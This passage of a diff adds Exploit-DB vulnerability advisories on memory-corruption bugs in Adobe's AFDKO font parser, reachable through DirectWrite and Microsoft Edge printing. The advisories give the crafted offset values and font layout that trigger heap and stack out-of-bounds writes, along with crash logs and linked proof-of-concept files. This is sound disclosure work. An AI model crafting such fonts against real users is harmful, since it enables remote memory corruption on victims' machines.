+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The readStrings() function in afdko/c/public/lib/source/cffread/cffread.c is designed to read the font name string and the string INDEX strings from the input font. The relevant part of the function is shown below:
+
+--- cut ---
+  1727      /* Get FontName data and compute its size */
+  1728      INDEXGet(h, &h->index.name, 0, &FontName);
+  1729      lenFontName = FontName.end - FontName.begin;
+  1730
+  1731      /* Compute string data size */
+  1732      lenStrings = (h->index.string.count == 0) ? 0 : (h->region.StringINDEX.end - h->index.string.data + 1 + /* String data bytes */
+  1733                                                       h->index.string.count);                                /* Null termination */
+  1734
+  1735      /* Allocate buffers */
+  1736      dnaSET_CNT(h->string.offsets, h->index.string.count + 1);
+  1737      dnaSET_CNT(h->string.ptrs, h->index.string.count);
+  1738      dnaSET_CNT(h->string.buf, lenFontName + 1 + lenStrings);
+  1739
+  1740      p = h->string.buf.array;
+  1741      *p = '\0';
+  1742      if (h->header.major == 1) {
+  1743          /* Copy FontName into buffer */
+  1744          srcSeek(h, FontName.begin);
+  1745          srcRead(h, lenFontName, p);
+  1746          p += lenFontName;
+  1747          *p++ = '\0';
+  1748      }
+--- cut ---
+
+The key line is 1738, where an integer overflow may occur. The "lenFontName" variable stores the length of the font name, which can be no greater than 65535. The "lenStrings" variable is initialized in lines 1732/1733 based on the length of the strings INDEX; primarily h->region.StringINDEX.end. The overall h->region.StringINDEX structure is filled out by the generic readINDEX() function, as called by cfrBegFont():
+
+--- cut ---
+  2712      if (h->header.major == 1) {
+  2713          h->region.StringINDEX.begin = h->region.TopDICTINDEX.end;
+  2714          if (h->region.StringINDEX.begin > 0) {
+  2715              readINDEX(h, &h->region.StringINDEX, &h->index.string);
+  2716              /* Read strings */
+  2717              readStrings(h);
+  2718          }
+--- cut ---
+
+More specifically, h->region.StringINDEX.end is written to in the last line of readINDEX():
+
+--- cut ---
+  1582      /* Read and validate offset size */
+  1583      index->offSize = read1(h);
+  1584      if (index->offSize < 1 || index->offSize > 4)
+  1585          fatal(h, cfrErrINDEXHeader);
+  1586
+  1587      index->offset = region->begin + cntSize + 1; /* Get offset array base */
+  1588
+  1589      /* Read and validate first offset */
+  1590      if (readN(h, index->offSize) != 1)
+  1591          fatal(h, cfrErrINDEXOffset);
+  1592
+  1593      /* Set data reference */
+  1594      index->data = index->offset + (index->count + 1) * index->offSize - 1;
+  1595
+  1596      /* Read last offset and compute INDEX length */
+  1597      srcSeek(h, index->offset + index->count * index->offSize);
+  1598      region->end = index->data + readN(h, index->offSize);
+  1599  }
+--- cut ---
+
+On platforms where "long" is a 32-bit type (Windows x86/x64 and Linux x86), this gives us complete control over the aforementioned field, including setting it to a negative value. This enables us to set the "lenStrings" variable to an arbitrary number, and thus makes it possible to choose it such that the result of the "lenFontName + 1 + lenStrings" expression is smaller than the sum of the font name's length and the length of all other strings. As a result, the heap-based h->string.buf.array object may be overflown, corrupting adjacent allocations in the following lines:
+
+--- cut ---
+  1740      p = h->string.buf.array;
+  1741      *p = '\0';
+  1742      if (h->header.major == 1) {
+  1743          /* Copy FontName into buffer */
+  1744          srcSeek(h, FontName.begin);
+  1745          srcRead(h, lenFontName, p);
+  1746          p += lenFontName;
+  1747          *p++ = '\0';
+  1748      }
+  1749
+[...]
+  1767
+  1768      /* Read string data */
+  1769      for (i = 0; i < (unsigned long)h->string.ptrs.cnt; i++) {
+  1770          long length =
+  1771              h->string.offsets.array[i + 1] - h->string.offsets.array[i];
+  1772          srcRead(h, length, p);
+  1773          h->string.ptrs.array[i] = p;
+  1774          p += length;
+  1775          *p++ = '\0';
+  1776      }
+--- cut ---
+
+Part of the problem contributing to the vulnerability is the unsafe addition in cffread.c:1738, but part of it is also the fact that h->region.StringINDEX.end may be fully controlled through readINDEX() and the function doesn't perform any sanity checking to make sure that the offset is within bounds of the CFF stream. We would therefore recommend adding more checks to readINDEX(), e.g. to also verify that all offsets specified in the INDEX are declared in ascending order and are also within bounds.
+
+The same checks should also be added to the analogous readSubrINDEX() function, which is even more permissive, as it allows an arbitrary value of offSize (instead of being limited to the 1-4 range). While we are at it, we also believe that the readN() routine should not ignore the N argument outside of <1 .. 4>, and instead throw a fatal error or at least attempt to read the specified N bytes from the input stream. Its current declaration is shown below:
+
+--- cut ---
+   505  /* Read 1-, 2-, 3-, or 4-byte number. */
+   506  static uint32_t readN(cfrCtx h, int N) {
+   507      uint32_t value = 0;
+   508      switch (N) {
+   509          case 4:
+   510              value = read1(h);
+   511          case 3:
+   512              value = value << 8 | read1(h);
+   513          case 2:
+   514              value = value << 8 | read1(h);
+   515          case 1:
+   516              value = value << 8 | read1(h);
+   517      }
+   518      return value;
+   519  }
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file contains a specially crafted String INDEX with the last offset set to -16397 (0xffffbff3) and the font name set to a "AAAA...AAAA" string consisting of 16384 bytes. This causes lenFontName to be equal to 16384 and lenStrings to be equal to -16384, so the whole "lenFontName + 1 + lenStrings" expression evaluates to 1. Despite this, because of the configuration of the h->string.buf dynamic array, the minimum allocation size is in fact 200. Then, a buffer overflow occurs while trying to load the 16384-byte string to the 200-byte allocation in the following line:
+
+--- cut ---
+  1745          srcRead(h, lenFontName, p);
+--- cut ---
+
+The font is also specially crafted to parse correctly with DirectWrite but trigger the bug in AFDKO. The original CFF2 table was left untouched, and an extra CFF table from another font was added to the file and corrupted in the way described above. This way, DirectWrite successfully loads the legitimate variable font, and AFDKO processes the modified version as the CFF table takes precedence over CFF2 due to the logic implemented in srcOpen() in afdko/c/public/lib/source/cffread/cffread.c.
+
+-----=====[ Crash logs ]=====-----
+
+A 32-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==116914==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf3603f88 at pc 0x0810d007 bp 0xffc4bba8 sp 0xffc4b780
+WRITE of size 8184 at 0xf3603f88 thread T0
+    #0 0x810d006 in __asan_memcpy (tx+0x810d006)
+    #1 0x819b191 in srcRead afdko/c/public/lib/source/cffread/cffread.c:481:9
+    #2 0x817df46 in readStrings afdko/c/public/lib/source/cffread/cffread.c:1745:9
+    #3 0x8178b5a in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2717:13
+    #4 0x8155d25 in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #5 0x81556df in doFile afdko/c/tx/source/tx.c:429:17
+    #6 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #7 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #8 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #9 0xf7b41275 in __libc_start_main
+    #10 0x806a590 in _start
+
+0xf3603f88 is located 0 bytes to the right of 200-byte region [0xf3603ec0,0xf3603f88)
+allocated by thread T0 here:
+    #0 0x810ddc5 in __interceptor_malloc (tx+0x810ddc5)
+    #1 0x833ccaf in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x8199bfa in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x84689ec in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x846919d in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x817dd0d in readStrings afdko/c/public/lib/source/cffread/cffread.c:1738:5
+    #6 0x8178b5a in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2717:13
+    #7 0x8155d25 in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #8 0x81556df in doFile afdko/c/tx/source/tx.c:429:17
+    #9 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #10 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #11 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #12 0xf7b41275 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (tx+0x810d006) in __asan_memcpy
+Shadow bytes around the buggy address:
+  0x3e6c07a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c07b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c07c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c07d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x3e6c07e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x3e6c07f0: 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c0800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c0810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c0820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c0830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3e6c0840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==116914==ABORTING
+--- cut ---
+
+A non-instrumented version of "tx" crashes with a SIGSEGV while trying to copy the font name into invalid memory:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0xf7eb50c0 in ?? () from /lib/i386-linux-gnu/libc.so.6
+(gdb) x/10i $eip
+=> 0xf7eb50c0:  movdqu %xmm1,-0x10(%edx,%ecx,1)
+   0xf7eb50c6:  jbe    0xf7eb537e
+   0xf7eb50cc:  movdqu 0x10(%eax),%xmm0
+   0xf7eb50d1:  movdqu -0x20(%eax,%ecx,1),%xmm1
+   0xf7eb50d7:  cmp    $0x40,%ecx
+   0xf7eb50da:  movdqu %xmm0,0x10(%edx)
+   0xf7eb50df:  movdqu %xmm1,-0x20(%edx,%ecx,1)
+   0xf7eb50e5:  jbe    0xf7eb537e
+   0xf7eb50eb:  movdqu 0x20(%eax),%xmm0
+   0xf7eb50f0:  movdqu 0x30(%eax),%xmm1
+
+(gdb) p/x $xmm1
+$1 = {v4_float = {0xc, 0xc, 0xc, 0xc}, v2_double = {0x228282, 0x228282}, v16_int8 = {0x41 <repeats 16 times>}, v8_int16 = {0x4141, 0x4141, 0x4141, 0x4141,
+    0x4141, 0x4141, 0x4141, 0x4141}, v4_int32 = {0x41414141, 0x41414141, 0x41414141, 0x41414141}, v2_int64 = {0x4141414141414141, 0x4141414141414141},
+  uint128 = 0x41414141414141414141414141414141}
+
+(gdb) info reg $edx
+edx            0x813ea78        135522936
+(gdb) info reg $ecx
+ecx            0x1ff8   8184
+(gdb) x/10gx $edx+$ecx
+0x8140a70:      Cannot access memory at address 0x8140a70
+
+(gdb) bt
+#0  0xf7eb50c0 in ?? () from /lib/i386-linux-gnu/libc.so.6
+#1  0x0805bb9c in srcRead (h=0x8131200, count=16384, ptr=0x813ea78 'A' <repeats 16 times>) at ../../../../../source/cffread/cffread.c:481
+#2  0x080557e3 in readStrings (h=0x8131200) at ../../../../../source/cffread/cffread.c:1745
+#3  0x080548ae in cfrBegFont (h=0x8131200, flags=4, origin=0, ttcIndex=0, top=0x8118024, UDV=0x0) at ../../../../../source/cffread/cffread.c:2717
+#4  0x0804d491 in cfrReadFont (h=0x8118008, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#5  0x0804d309 in doFile (h=0x8118008, srcname=0xffffcf11 "poc.otf") at ../../../../source/tx.c:429
+#6  0x0804c9b6 in doSingleFileSet (h=0x8118008, srcname=0xffffcf11 "poc.otf") at ../../../../source/tx.c:488
+#7  0x0804a82a in parseArgs (h=0x8118008, argc=3, argv=0xffffcd58) at ../../../../source/tx.c:558
+#8  0x08049665 in main (argc=3, argv=0xffffcd58) at ../../../../source/tx.c:1631
+--- cut ---
+
+In case of the Microsoft Edge renderer, it doesn't immediately crash during the buffer overflow, because there is enough mapped heap memory after the overflow allocation to consume the 16kB string. As a result of the memory corruption, however, an exception is generated a little later in the code while trying to access an invalid pointer overwritten with 0x4141...41:
+
+--- cut ---
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!fillSet+0x37:
+00007ffb`29e701a3 39bc2e58020000  cmp     dword ptr [rsi+rbp+258h],edi ds:41414141`41414399=????????
+
+0:038> u @$scopeip-4
+DWrite!fillSet+0x33:
+00007ffb`29e7019f 488b6b10        mov     rbp,qword ptr [rbx+10h]
+00007ffb`29e701a3 39bc2e58020000  cmp     dword ptr [rsi+rbp+258h],edi
+00007ffb`29e701aa 7e21            jle     DWrite!fillSet+0x61 (00007ffb`29e701cd)
+00007ffb`29e701ac 4c8b8c2e50020000 mov     r9,qword ptr [rsi+rbp+250h]
+00007ffb`29e701b4 4c8d4508        lea     r8,[rbp+8]
+00007ffb`29e701b8 488d95f8010000  lea     rdx,[rbp+1F8h]
+00007ffb`29e701bf 4c03c6          add     r8,rsi
+00007ffb`29e701c2 4803d6          add     rdx,rsi
+
+0:038> db rbx
+00000131`256e9ca0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9cb0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9cc0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9cd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9ce0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9cf0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9d00  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00000131`256e9d10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 00000008`c4d5b550 00007ffb`29e7219d DWrite!fillSet+0x37
+01 00000008`c4d5b5c0 00007ffb`29e62314 DWrite!cfwEndSet+0x51
+02 00000008`c4d5b600 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x23c
+03 00000008`c4d5bb00 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+04 00000008`c4d5bce0 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+05 00000008`c4d5bf00 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+06 00000008`c4d5c260 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+07 00000008`c4d5c2f0 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+08 00000008`c4d5c410 00007ffb`0f8b50f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+09 00000008`c4d5c460 00007ffb`0f88fcb0 edgehtml!CDXPrintControl::Close+0x44
+0a 00000008`c4d5c4b0 00007ffb`0f8947ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0b 00000008`c4d5c4e0 00007ffb`0f76b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0c 00000008`c4d5c510 00007ffb`0f3c9175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0d 00000008`c4d5c550 00007ffa`f02e68f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47098.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47099.txt b/exploits/windows/dos/47099.txt
new file mode 100644
index 000000000..b8bb38c4b
--- /dev/null
+++ b/exploits/windows/dos/47099.txt
@@ -0,0 +1,165 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The handleBlend() function in afdko/c/public/lib/source/cffread/cffread.c is called when a cff_blend operator is encountered while parsing a CFF DICT object in readDICT():
+
+--- cut ---
+  1466              case cff_blend:
+  1467                  if (h->stack.numRegions == 0) {
+  1468                      /* priv->vsindex is set to 0 by default; it is otherwise only if the vsindex operator is used */
+  1469                      setNumMasters(h, priv->vsindex);
+  1470                  }
+  1471                  handleBlend(h);
+  1472                  continue;
+--- cut ---
+
+The prologue of handleBlend() is as follows:
+
+--- cut ---
+   757  static void handleBlend(cfrCtx h) {
+[...]
+   776
+   777      int numBlends = INDEX_INT(h->stack.cnt - 1);
+   778      stack_elem *firstItem;
+   779      int i = 0;
+   780      int numDeltaBlends = numBlends * h->stack.numRegions;
+   781      int firstItemIndex;
+   782      h->flags |= CFR_SEEN_BLEND;
+   783
+   784      h->stack.cnt--;
+   785
+   786      if (numBlends < 0 || numDeltaBlends < 0)
+   787          fatal(h, cfrErrStackUnderflow);
+   788      CHKUFLOW(numBlends + numDeltaBlends);
+   789      firstItemIndex = (h->stack.cnt - (numBlends + numDeltaBlends));
+   790      firstItem = &(h->stack.array[firstItemIndex]);
+   791
+--- cut ---
+
+Here is what happens in the code: the 32-bit numBlends variable is initialized with a fully controlled value from the top of the interpreter stack. The numDeltaBlends variable is calculated using numBlends and h->stack.numRegions, which is a typically small (theoretically up to 65535) but also controlled value. The code then makes sure that neither numBlends or numDeltaBlends are negative (line 786), and that there are at least numBlends+numDeltaBlends values on the stack (line 788). If these conditions are met, the function proceeds to writing to h->stack.array[h->stack.cnt - (numBlends + numDeltaBlends)] and further elements assuming the access is safe.
+
+However, the sanity checks in lines 786-788 are not sufficient, as they miss one corner case - when both numBlends and numDeltaBlends are positive, but the numBlends + numDeltaBlends sum is negative due to signed 32-bit integer arithmetic. For example, if:
+
+- numBlends is 0x31313131
+- h->stack.numRegions is 2
+
+then:
+
+- numDeltaBlends is 0x62626262
+- numBlends + numDeltaBlends is 0x93939393
+
+The above values can be set by a specially crafted font and they meet the conditions verified by handleBlend(), yet the index of -0x93939393 (which translates to 1819044973) is largely out of bounds. This may be used to overwrite memory both inside of the stack-based cfrCtx object, and outside of it.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file contains a Private DICT beginning with the following two operators:
+
+1. cff_longint(0x31313131)
+2. cff_blend
+
+This causes the above signedness issue to occur, leading to an attempt to write to a stack element at h->stack.array[1819044973].
+
+The font is also specially crafted to parse correctly with DirectWrite but trigger the bug in AFDKO. The original CFF2 table was left untouched, and a second copy of it with the modified DICT was inserted at the end of the font with the tag "CFF ". This way, DirectWrite successfully loads the legitimate variable font, and AFDKO processes the modified version as the CFF table takes precedence over CFF2 due to the logic implemented in srcOpen() in afdko/c/public/lib/source/cffread/cffread.c.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" started with ./tx -cff poc.otf crashes with a SIGSEGV while trying to write to an unmapped memory address:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x000000000041670e in handleBlend (h=0x7103a0) at ../../../../../source/cffread/cffread.c:811
+811             firstItem->numBlends = (unsigned short)numBlends;
+
+(gdb) print numBlends
+$1 = 825307441
+(gdb) print numDeltaBlends
+$2 = 1650614882
+(gdb) print numBlends+numDeltaBlends
+$3 = -1819044973
+(gdb) print firstItemIndex
+$5 = 1819044973
+
+(gdb) x/10i $rip
+=> 0x41670e <handleBlend+878>:  mov    %cx,0x8(%rdx)
+   0x416712 <handleBlend+882>:  mov    -0x8(%rbp),%rdi
+   0x416716 <handleBlend+886>:  movslq -0x20(%rbp),%rdx
+   0x41671a <handleBlend+890>:  shl    $0x2,%rdx
+   0x41671e <handleBlend+894>:  mov    %rdx,%rsi
+   0x416721 <handleBlend+897>:  callq  0x416880 <memNew>
+   0x416726 <handleBlend+902>:  mov    -0x18(%rbp),%rdx
+   0x41672a <handleBlend+906>:  mov    %rax,0x10(%rdx)
+   0x41672e <handleBlend+910>:  mov    -0x1c(%rbp),%eax
+   0x416731 <handleBlend+913>:  cmp    -0x20(%rbp),%eax
+
+(gdb) info reg $rdx
+rdx            0xa2a9b3280      43664487040
+(gdb) x/10gx $rdx
+0xa2a9b3280:    Cannot access memory at address 0xa2a9b3280
+
+(gdb) bt
+#0  0x000000000041670e in handleBlend (h=0x7103a0) at ../../../../../source/cffread/cffread.c:811
+#1  0x0000000000411318 in readDICT (h=0x7103a0, region=0x7156d8, topdict=0) at ../../../../../source/cffread/cffread.c:1471
+#2  0x000000000041241f in readPrivate (h=0x7103a0, iFD=0) at ../../../../../source/cffread/cffread.c:1637
+#3  0x0000000000411a17 in readFDArray (h=0x7103a0) at ../../../../../source/cffread/cffread.c:1711
+#4  0x000000000040dc5c in cfrBegFont (h=0x7103a0, flags=4, origin=0, ttcIndex=0, top=0x6f6048, UDV=0x0) at ../../../../../source/cffread/cffread.c:2761
+#5  0x0000000000405e4e in cfrReadFont (h=0x6f6010, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#6  0x0000000000405c9e in doFile (h=0x6f6010, srcname=0x7fffffffdf1b "poc.otf") at ../../../../source/tx.c:429
+#7  0x000000000040532e in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf1b "poc.otf")
+    at ../../../../source/tx.c:488
+#8  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:558
+#9  0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A similar Microsoft Edge renderer process crash (but in a slightly different code path) is also shown below:
+
+--- cut ---
+(50d4.f24): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!handleBlend+0xc1:
+00007ffb`29e68f5d 4439a4cb28030000 cmp     dword ptr [rbx+rcx*8+328h],r12d ds:0000016e`de978c30=????????
+0:039> ? rbx
+Evaluate expression: 1532035423952 = 00000164`b46d5ed0
+0:039> ? rcx
+Evaluate expression: 5457134919 = 00000001`45454547
+0:039> k
+ # Child-SP          RetAddr           Call Site
+00 00000021`5eeea990 00007ffb`29e6b2e3 DWrite!handleBlend+0xc1
+01 00000021`5eeea9d0 00007ffb`29e6c41e DWrite!readDICT+0xf67
+02 00000021`5eeeaa30 00007ffb`29e6bc33 DWrite!readPrivate+0x3a
+03 00000021`5eeeaa60 00007ffb`29e6ddf4 DWrite!readFDArray+0xcb
+04 00000021`5eeeaa90 00007ffb`29e621e7 DWrite!cfrBegFont+0x548
+05 00000021`5eeeb320 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x10f
+06 00000021`5eeeb820 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+07 00000021`5eeeba00 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+08 00000021`5eeebc20 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+09 00000021`5eeebf80 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+0a 00000021`5eeec010 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0b 00000021`5eeec130 00007ffb`0f8b50f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0c 00000021`5eeec180 00007ffb`0f88fcb0 edgehtml!CDXPrintControl::Close+0x44
+0d 00000021`5eeec1d0 00007ffb`0f8947ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0e 00000021`5eeec200 00007ffb`0f76b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0f 00000021`5eeec230 00007ffb`0f3c9175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+10 00000021`5eeec270 00007ffa`f02e68f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47099.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47100.txt b/exploits/windows/dos/47100.txt
new file mode 100644
index 000000000..f07276bb9
--- /dev/null
+++ b/exploits/windows/dos/47100.txt
@@ -0,0 +1,186 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
